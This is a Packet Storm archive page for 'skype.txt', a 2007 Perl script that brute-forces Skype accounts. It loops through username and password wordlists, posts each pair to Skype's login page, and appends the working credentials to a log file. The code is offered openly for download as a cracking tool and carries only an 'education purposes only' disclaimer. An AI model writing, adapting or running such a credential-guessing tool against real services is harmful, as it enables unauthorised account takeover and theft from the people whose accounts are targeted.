exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

skype.txt

skype.txt
Posted May 24, 2007
Authored by matrix killer

Simple Skype password cracker written in Perl.

tags | cracker, perl
SHA-256 | 2cd132cbd745bc4cf6895908ce3042740fe1ac6c1a9ec1575fb664736f5b3bfc

skype.txt

Change Mirror Download
#!perl
#----------------------------------------------------------------------------------------------|
#With this program you can bruteforce skype accounts |
#Authors: Alexander Rachev (a.k.a matrix_killer) |
#Contact: matrix_k _at_ abv.bg |
#Version: 1.0 |
#Copyright: this program is under a Creative Commons Attribution 2.5 Bulgaria License. |
#Greets: Bl0od3r, Acid_BDS, Alpha-fan and all other friends[they know who they are ;)] |
# !WARNING! |
# THIS PROGRAM IS MADE FOR EDUCATION PURPOSES ONLY ! I'M NOT RESPONSIBLE FOR YOUR ACTIONS !!! |
#----------------------------------------------------------------------------------------------|

#http://search.cpan.org/~dland/Crypt-SSLeay-0.54/SSLeay.pm IS REQUIRED !!!!

use Getopt::Std;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

$SIG{'INT'} = \&sig_catch;$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE';
$SIG{'CHLD'}='IGNORE';$SIG{'ALRM'}='IGNORE';

$| = 1;

sub sig_catch {
exit;
}

getopts('u:p:');
our($opt_u,$opt_p);

my $userlist = $opt_u;
my $passlist = $opt_p;

if ($userlist eq "") {
print "\n";
print "***************************************************************************\n";
print "Skype Bruteforcer v1.0 \n";
print "By Alexander Rachev(a.k.a matrix_killer) \n";
print "usage: perl $0 -u <users> -p <passwords> \n";
print "***************************************************************************\n";
exit (1);
}

open(USERS, "<$userlist") || die ("Cannot open username file");
open(WORDS, "<$passlist") || die ("Cannot open password file");
@users= <USERS>;
@words= <WORDS>;
close(USERS);
close(WORDS);
$i=0;

foreach $user (@users) {
chomp($user);
foreach $pass (@words) {
chomp($pass);
$ua = LWP::UserAgent->new;
printf("\n%5d Trying $user:$pass", ++$i);
my $req = POST 'https://secure.skype.com/store/member/dologin.html',
[ username => $user, password => $pass, login => 'Sign+me+in' ];

my $res = $ua->request($req);

if ($res->as_string =~ /cookiecheck/gi) {
open (LOG, ">>bruted_skype_accounts.txt");
$time = time();
$loctime = localtime($time);
print LOG "\n";
print LOG "Time: $loctime\n";
print LOG "username: $user\n";
print LOG "passowrd: $pass\n\n";
close(LOG);
}}}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close